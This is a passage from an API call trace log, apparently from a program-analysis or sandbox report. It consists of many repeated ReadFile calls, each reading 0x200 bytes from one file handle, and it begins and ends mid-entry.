lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.238] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: 
lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, 
lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.239] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.240] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.241] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.241] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.241] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.241] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, 
lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile 
(in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 
[0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, 
lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, 
lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: 
lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, 
lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: 